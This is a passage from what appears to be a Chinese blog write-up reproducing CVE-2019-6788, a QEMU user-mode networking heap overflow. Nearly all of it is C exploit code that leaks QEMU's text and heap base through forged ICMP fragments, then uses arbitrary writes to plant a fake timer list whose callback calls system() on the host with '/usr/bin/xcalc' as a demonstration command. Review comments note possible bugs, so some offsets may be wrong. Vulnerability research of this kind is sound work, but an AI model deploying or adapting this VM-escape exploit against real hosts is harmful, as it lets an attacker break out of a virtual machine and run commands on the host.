//      header whose last field (m_data) holds the low addr_len bytes of addr,
//      least significant byte first;
//   5. send the closing, empty fragment (MF clear, offset 0x300+24);
//   6. sniff frames on a packet socket until an ICMP echo reply of at least
//      0x200 bytes arrives, hexdump it, and compute
//        text_base = (8 bytes at frame offset 0x58 - 0x217bc80) & ~0xfff
//        heap_base = (8 bytes at frame offset 0xa8 - 0x1b0)     & ~0xffffff
//
// addr     - value whose low addr_len bytes are placed in m_data.
// addr_len - number of bytes of addr to send, 0..8.
//
// Exits the process when no frame is received within 2 seconds or when
// receiving fails for a reason other than an interrupted call.
void leak(uint64_t addr, int addr_len){
    int s, len, i, recvsd;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;
    uint8_t *payload, *payload_start;
    uint32_t *payload32;
    uint64_t *payload64;

    // Validate before anything is sent.
    assert(addr_len >= 0 && addr_len <= 8);

    payload = (uint8_t *)malloc(IP_MAXPACKET);
    if(payload == NULL){
        Err("malloc failed in leak");
        exit(EXIT_FAILURE);
    }
    payload_start = payload;
    payload64 = (uint64_t *)payload;

    // Filler bytes; the marker must be a string literal, not a character constant.
    memset(payload, 'a', 0x1000);
    memcpy(payload, "a1exxx", 6);

    printf("leak data:\n");
    for(i = 0; i<0x20; ++i){
        spray_chunk(0x2000, spray_ip_id+i);
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if(s < 0){
        Err("socket failed in leak");
        exit(EXIT_FAILURE);
    }
    memset(&ip_addr, 0, sizeof(ip_addr));
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);
    len = sizeof(struct sockaddr_in);
    //malloc so_rcv
    ret = connect(s, (struct sockaddr*)&ip_addr, len);
    if(ret == -1){
        Err("connect failed in leak");
    }

    // First ICMP fragment: MF set, so more fragments are announced.
    memset(&pkt_info, 0, sizeof(pkt_info));
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0;
    pkt_info.ip_p = IPPROTO_ICMP;
    pkt_info.MF = 1;
    //malloc mbuf
    send_ip_pkt(&pkt_info, payload, 0x300+4);   //mbuf is after so_rcv

    // Filler traffic ahead of the forged header.
    for(i=0; i<6; i++){
        if(write(s, payload, 0x500) < 0){
            Err("write failed in leak");
        }
        printf("send %d ok\n", i);
    }
    if(write(s, payload, 1072) < 0){
        Err("write failed in leak");
    }

    // Forged chunk header followed by mbuf fields
    *payload64++ = 0;
    *payload64++ = 0x675;   //chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t*)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;       // m_so
    payload = (uint8_t *)payload64;
    // Only the low addr_len bytes of m_data are sent, little-endian.
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr >>(i*8)) & 0xff; //m_data
    }
    //chunk overflow
    //change icmp's mbuf->m_data to fake_icmp_response_data
    if(write(s, payload_start, (uint8_t *)payload - payload_start) < 0){
        Err("write failed in leak");
    }

    printf("[+]leaking: Now we have finished faking m_data\n");
    printf("trigger reass!\n");
    memset(payload, 'a', 0x1000);
    memcpy(payload, "a1exxx", 6);
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;
    pkt_info.ip_p = IPPROTO_ICMP;

    // Open the sniffing socket before the closing fragment goes out so the
    // reply cannot be missed.
    recvsd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if(recvsd < 0){
        Err("packet socket failed in leak");
        exit(EXIT_FAILURE);
    }
    send_ip_pkt(&pkt_info, payload, 0);
    printf("[+] leaking: Now we hace finished writing to target\nAlso, this means \n");

    //recv data
    int bytes, status;
    struct ip *recv_iphdr;
    struct icmp *recv_icmphdr;
    uint8_t recv_ether_frame[IP_MAXPACKET];
    struct sockaddr from;
    socklen_t fromlen;
    struct timeval wait, t1, t2;
    struct timezone tz;
    double dt;

    (void)gettimeofday(&t1, &tz);
    // Give up when nothing arrives for 2 seconds.
    wait.tv_sec = 2;
    wait.tv_usec = 0;
    setsockopt(recvsd, SOL_SOCKET, SO_RCVTIMEO, (char*)&wait,
            sizeof(struct timeval));
    recv_iphdr = (struct ip*)(recv_ether_frame + ETH_HDRLEN);
    recv_icmphdr = (struct icmp*)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
    int count = 0;
    while(1){
        memset(recv_ether_frame, 0, IP_MAXPACKET*sizeof(uint8_t));
        memset(&from, 0, sizeof(from));
        fromlen = sizeof(from);
        if((bytes = recvfrom(recvsd, recv_ether_frame, IP_MAXPACKET, 0,
                    (struct sockaddr*)&from, &fromlen)) < 0){
            status = errno;
            if(status == EAGAIN){   //EAGAIN = 11
                printf("No reply within %li seconds\n", wait.tv_sec);
                exit(EXIT_FAILURE);
            }else if(status == EINTR){
                continue;
            }else{
                printf("recvfrom failed");
                exit(EXIT_FAILURE);
            }
        }

        printf("recv count %d\n", count++);
        // Bytes 12..13 of the Ethernet header carry the EtherType.
        if((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) 
            && (recv_iphdr->ip_p == IPPROTO_ICMP) 
            && (recv_icmphdr->icmp_type == ICMP_ECHOREPLY)){
            uint64_t text_ptr, heap_ptr;

            (void)gettimeofday(&t2, &tz);
            dt = (double)(t2.tv_sec - t1.tv_sec) * 1000.0 +
                 (double)(t2.tv_usec - t1.tv_usec) / 1000.0;
            printf("%g ms (%i bytes received)\n", dt, bytes);
            printf("ping recv:\n");
            hexdump(recv_ether_frame, bytes);

            // Shorter replies do not reach the offsets read below.
            if(bytes < 0x200)
                continue;
            // The offsets are not 8-byte aligned, so copy instead of casting.
            memcpy(&text_ptr, recv_ether_frame + 0x58, sizeof(text_ptr));
            memcpy(&heap_ptr, recv_ether_frame + 0xa8, sizeof(heap_ptr));
            text_base = (text_ptr - 0x217bc80) & ~0xfff;
            heap_base = (heap_ptr - 0x1b0) & ~0xffffff;
            dbg_printf("leak text_base: 0x%lx\n"
                       "leak heap_base: 0x%lx\n",
                       text_base, heap_base);
            break;
        }
    }

    close(s);
    close(recvsd);
    free(payload_start);
}

// Empty stub: calling it has no effect.
void fake_timer(){
    return;
}

// Exploit driver. Runs four stages in order:
//   1. build an Ethernet + IPv4 + ICMP echo frame followed by the command
//      string in buf and hand it to arbitray_write() with a 3-byte target
//      of 0x0b00;
//   2. call leak() to fill the globals text_base and heap_base;
//   3. lay out a forged timer list in buf and write it to heap_base + 0x1000;
//   4. write the address of that forged list to text_base + 0x12c3900
//      (labelled main_loop_tlg by the messages below).
// Every target address handed to arbitray_write() is reduced by 0x318.
// Returns 0 after the last write has been issued.
int main(){
    char eth_frame[] = "\x52\x56\x00\x00\x00\x02\x52\x54\x00\x12\x34\x56\x08\x00";
    struct icmp *icmphdr;
    struct ip* iphdr;
    // Zeroed so that every field not assigned below has a defined value.
    uint8_t buf[IP_MAXPACKET] = {0};
    char src_ip[INET_ADDRSTRLEN], dst_ip[INET_ADDRSTRLEN];
    int status;

    memcpy(buf, eth_frame, ETH_HDRLEN);
    iphdr = (struct ip*)(buf + ETH_HDRLEN);
    strcpy(src_ip, "10.0.2.15");
    strcpy(dst_ip, "10.0.2.2");

    // NOTE(review): ip_len and ip_id are stored without htons(); presumably
    // deliberate because this frame is written into memory rather than sent
    // on the wire — confirm.
    iphdr->ip_hl = IP4_HDRLEN / sizeof(uint32_t);
    iphdr->ip_v = 4;
    iphdr->ip_tos = 0;
    iphdr->ip_len = ICMP_HDRLEN;
    iphdr->ip_id = 0xcdcd;
    // Zero (1 bit)
    // Do not fragment flag (1 bit)
    // More fragments following flag (1 bit)
    // Fragmentation offset (13 bits)
    iphdr->ip_off = ((0<<15) + (0<<14) + (0<<13) + (0>>3));
    iphdr->ip_ttl = 255;
    iphdr->ip_p = IPPROTO_ICMP;

    // inet_pton() returns 0 for a malformed address and -1 with errno set,
    // so its return value must not be handed to strerror().
    status = inet_pton(AF_INET, src_ip, &(iphdr->ip_src));
    if(status == 1){
        status = inet_pton(AF_INET, dst_ip, &(iphdr->ip_dst));
    }
    if(status != 1){
        printf("inet_pton() failed, Error message: %s",
               status < 0 ? strerror(errno) : "not a valid IPv4 address");
        exit(EXIT_FAILURE);
    }
    iphdr->ip_sum = 0;
    // Checksum the header itself, not the pointer variable that refers to it.
    iphdr->ip_sum = csum((uint16_t *)iphdr, IP4_HDRLEN);

    icmphdr = (struct icmp*)(buf + ETH_HDRLEN + IP4_HDRLEN);
    icmphdr->icmp_type = ICMP_ECHO;
    //Message Code (8 bits): echo request
    icmphdr->icmp_code = 0;
    //Identifier (16 bits): not assigned, stays 0 from the zeroed buffer
    //Sequence Number (16 bits)
    icmphdr->icmp_seq = htons(0);
    //ICMP header checksum (16 bits), computed over the header only
    icmphdr->icmp_cksum = icmp4_checksum(*icmphdr, buf, 0);
    
    const char exec_cmd[] = "/usr/bin/xcalc";
    printf("icmp packet over\n");
    // The command string (with its terminator) sits right after the ICMP header.
    memcpy(buf+ETH_HDRLEN+IP4_HDRLEN+ICMP_HDRLEN, exec_cmd, sizeof(exec_cmd));
    spray_ip_id = 0xaabb;
    printf("arbitrary write icmp mbuf begin\n");
    //arbitrary write fake_icmp_response_pkt
    arbitray_write(0x0b00, 3, buf,
        ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN + sizeof(exec_cmd), 0x250+0x50);
    printf("arbitrary write icmp mbuf ok\n");
    getchar();

    printf("leak text and heap addr\n");
    leak(0xb00+0x318+0x14+ETH_HDRLEN, 3);

    // Forged timer list, written to heap_base + 0x1000.
    // NOTE(review): offset 0x88 of buf is never assigned in this layout; if
    // the forged timer needs an argument for its callback (for example the
    // address of exec_cmd), it is missing here — confirm.
    uint64_t fake_timer_list = heap_base + 0x1000;
    *(uint64_t *)buf = text_base + 0x12c3920;   //qemu_clocks
    memset(buf+8, 0, 8*6);
    *(uint64_t *)(buf+0x38) = 0x0000000100000000;
    *(uint64_t *)(buf+0x40) = fake_timer_list + 0x70;   // active_timers
    *(uint64_t *)(buf+0x48) = 0;
    *(uint64_t *)(buf+0x50) = 0;
    *(uint64_t *)(buf+0x58) = text_base + 0x30eeda;     // qemu_timer_notify_cb
    *(uint64_t *)(buf + 0x60)=0;
    *(uint64_t *)(buf + 0x68) = 0x0000000100000000;     

    *(uint64_t *)(buf + 0x70) = 0;  // expire_time set to 0 will trigger func cb
    *(uint64_t *)(buf + 0x78) = fake_timer_list;
    *(uint64_t *)(buf + 0x80) = text_base + 0x2be010;    // system_plt
    *(uint64_t *)(buf + 0x90) = 0;
    *(uint64_t *)(buf + 0x98) = 0x000f424000000000;
    spray_ip_id = 0xccbb;
    printf("forge fake timer_list in buf");
    arbitray_write(fake_timer_list - 0x318, 8, buf, 0xa0, 0x20);
    printf("[+] Now we have finished writing fake timer list\n");

    // Final stage: point the target at the forged list.
    // NOTE(review): 0x12c3900 replaces 0x12c39000, which looked like a typo —
    // the intended target appears to sit 0x20 below the qemu_clocks offset
    // 0x12c3920 used above; verify against the binary.
    stop_flag = 1;
    *(uint64_t *)buf = fake_timer_list; // value stored at the target
    spray_ip_id = 0xddbb;
    arbitray_write(text_base + 0x12c3900 - 0x318, 8, buf, 8, 0x20);
    printf("[+] Now we have finished writing main_loop_tlg\n");
    return 0;
}

参考文献

qemu-pwn cve-2019-6788堆溢出漏洞分析

CVE-2019-6788 Qemu逃逸漏洞复现与分析

本文作者： A1ex
本文链接： http://yoursite.com/2021/10/24/CVE-2019-6788-Qemu逃逸漏洞复现与分析/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！